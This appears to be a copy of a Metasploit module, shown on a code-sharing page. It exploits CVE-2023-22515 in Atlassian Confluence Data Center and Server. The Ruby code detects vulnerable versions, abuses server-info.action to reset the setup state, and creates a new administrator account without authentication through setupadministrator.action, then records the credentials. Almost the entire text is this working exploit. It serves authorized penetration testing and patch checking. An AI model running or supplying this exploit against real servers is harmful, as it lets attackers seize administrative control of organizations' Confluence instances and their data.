扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control', 'Description' => %q{ This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass. A specially crafted request can be create new admin account without authentication on the target Atlassian server. }, 'Author' => [ 'Unknown', # exploited in the wild 'Emir Polat' # metasploit module ], 'References' => [ ['CVE', '2023-22515'], ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'], ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'] ], 'DisclosureDate' => '2023-10-04', 'DefaultOptions' => { 'RPORT' => 8090 }, 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/), OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]), OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/login.action') ) return Exploit::CheckCode::Unknown unless res return Exploit::CheckCode::Safe unless res.code == 200 poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/ confluence_version = Rex::Version.new(Regexp.last_match(1)) vprint_status("Detected Confluence version: #{confluence_version}") if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) || confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) || confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1')) return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") end Exploit::CheckCode::Safe("Confluence version: #{confluence_version}") end def run res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/server-info.action'), 'vars_get' => { 'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false' } ) return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200 print_good('Found server-info.action! Trying to ignore setup.') created_user = create_admin_user res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' } ) return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200 create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, username: datastore['NEW_USERNAME'], private_type: :password, private_data: datastore['NEW_PASSWORD'], service_name: 'Atlassian Confluence', address: datastore['RHOST'], port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED }) print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}") print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action") end def create_admin_user res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' }, 'vars_post' => { 'username' => datastore['NEW_USERNAME'], 'fullName' => 'New Admin', 'email' => datastore['NEW_EMAIL'], 'password' => datastore['NEW_PASSWORD'], 'confirm' => datastore['NEW_PASSWORD'], 'setup-next-button' => 'Next' } ) res&.code == 302 end end |
体验盒子
